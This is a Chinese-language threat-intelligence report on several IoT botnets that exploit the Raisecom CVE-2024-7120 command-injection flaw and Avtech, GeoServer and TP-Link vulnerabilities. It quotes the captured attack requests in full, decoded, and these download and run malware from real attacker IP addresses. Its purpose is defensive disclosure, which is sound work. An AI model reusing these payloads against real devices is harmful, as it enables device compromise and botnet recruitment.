近期,360安全大脑监测发现多个僵尸网络正利用Raisecom MSG1200 命令注入漏洞(CVE-2024-7120)发起攻击。进一步分析发现,45.202.32.0/22下更是托管了5个僵尸网络,该僵尸网络群目前已知的21个下载服务器部署在全球多个国家,并在攻击活动中利用了4个较新漏洞:CVE-2024-7120、Avtech网络摄影机命令注入漏洞(CVE-2024-7029)、GeoServer 远程代码执行漏洞(CVE-2024-36401)、TP-LINK Archer AX21命令注入漏洞(CVE-2023-1389)。
上述僵尸网络均在快速迭代中且C2更换频繁,值得安全社区引起注意。
在Raisecom MSG1200、MSG2100E、MSG2200和MSG2300 3.90版本网关设备的list_base_config.php脚本中存在命令注入漏洞(CVE-2024-7120)。该漏洞于2024.7.26被公开披露,通过操纵参数模板可导致命令注入从而实现远程攻击。截至发稿时, Raisecom官网尚未发布修复补丁。
分析发现45.202.35.94下托管了5个僵尸网络家族(AISURU新变种、CodingDrunk、CatDDoS、HitlerBot、Pyinstaller打包的Flooder),其利用CVE-2024-7120传播的Payload如下:
|
如下是该僵尸网络群下发攻击Payload IP及下载服务器的关系图,图标实体越大表示关联的IP越多,可以看到僵尸网络群下载服务器集中在45.202.32.0/22、154.216.16.0/22地址块,且两个地址块下均托管了多个不同的僵尸网络,5个僵尸网络中CatDDoS、HitlerBot僵尸网络关联的IP最多。
2.1 AISURU僵尸网络新变种
|
2.2 CodingDrunk僵尸网络
45.202.35.94下还托管了一类新的Mirai变种,因该变种C2域名多包含f.codingdrunk.cc(如:9492e2ff8e6295ee99ee1060aa36e7de),遂命名为CodingDrunk僵尸网络。
POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 action=white_led&brightness=$(cd%20/tmp;%20rm%20-rf%20wget.sh;%20wget%20http://87.121.112.46/wget.sh;%20chmod%20777%20wget.sh;%20./wget.sh%20avtech;%20rm%20-rf%20wget.sh%202>%261)# 解码后: POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 action=white_led&brightness=$(cd /tmp; rm -rf wget.sh; wget http://87.121.112.46/wget.sh; chmod 777 wget.sh; ./wget.sh avtech; rm -rf wget.sh 2>&1)# |
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id>`cd /tmp; rm -rf wget.sh; wget http://87.121.112.46/wget.sh; chmod 777 wget.sh; ./wget.sh tplink; rm -rf wget.sh |
2.3 CatDDoS僵尸网络
GET /geoserver/wfs?request=GetPropertyValue&service=wfs&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),”rm x86; curl –output x86 http://45.202.35.88/x86; chmod 777 x86; ./x86 geo”)&version=2.0.0 |
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf tplink; wget http://45.202.35.88/tplink; chmod 777 tplink; ./tplink tplink; rm -rf tplink` |
2.4 HitlerBot僵尸网络
POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F45.202.35.94%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink+tplink%3B+rm+-rf+tplink%60) HTTP/1.1 解码后: POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf tplink; wget http://45.202.35.94/tplink; chmod 777 tplink; ./tplink tplink; rm -rf tplink`) HTTP/1.1 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1 解码后: GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id>`wget http://185.157.247.125/e/t -O- |sh;` HTTP/1.1 |
45.202.35.94下还托管了一类Pyinstaller打包的Flooder程序(f435d08ccd88c230b983fb410ce43367,http://45.202.35[.]94/bot),还原后的python脚本内容如下(内嵌C2: 194.165.16.26:31412),可看到其包含udp_flood、udphex_flood、tcp_flood、http_flood四种DDoS攻击方式:
141.98.11.136下托管了多个EnemyBot僵尸程序,其还被托管在77.37.96.100、91.92.248.237、93.123.85.123等服务器下,该僵尸网络利用CVE-2024-7120传播的Payload如下:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60 解码后: GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`cd /tmp; tftp -g -r ppc 141.98.11.136 69; chmod 777 ppc; ./ppc raisee` |
广大用户可使用360安全大脑相关产品进行实时拦截与防护,并从以下4个方面进行加固,以免遭受黑客攻击,造成不必要的损失。
Tips
1)及时更新主机漏洞补丁,将应用软件升级到安全版本;
2)服务器应配置高强度的登录密码(大小写字母、数字和特殊字符的组合密码),并定期更换密码;
3)修改ssh端口为其他端口(非22端口);
4)若非业务需要,不要在公网开放业务端口,采用本地或内网访问,设置访问白名单等方式进行加固。
-
C2:
-
45.202.35.94下托管的5类Bot:
-
141.98.11.136下托管的EnemyBot:
-
下载服务器C2:
-
下发攻击Payload的IP:
-
MD5:
-
45.202.35.94下托管的5类Bot:
-
141.98.11.136下托管的EnemyBot:
原文始发于微信公众号(360威胁情报中心):多个僵尸网络正利用Raisecom MSG1200 命令执行漏洞(CVE-2024-7120)传播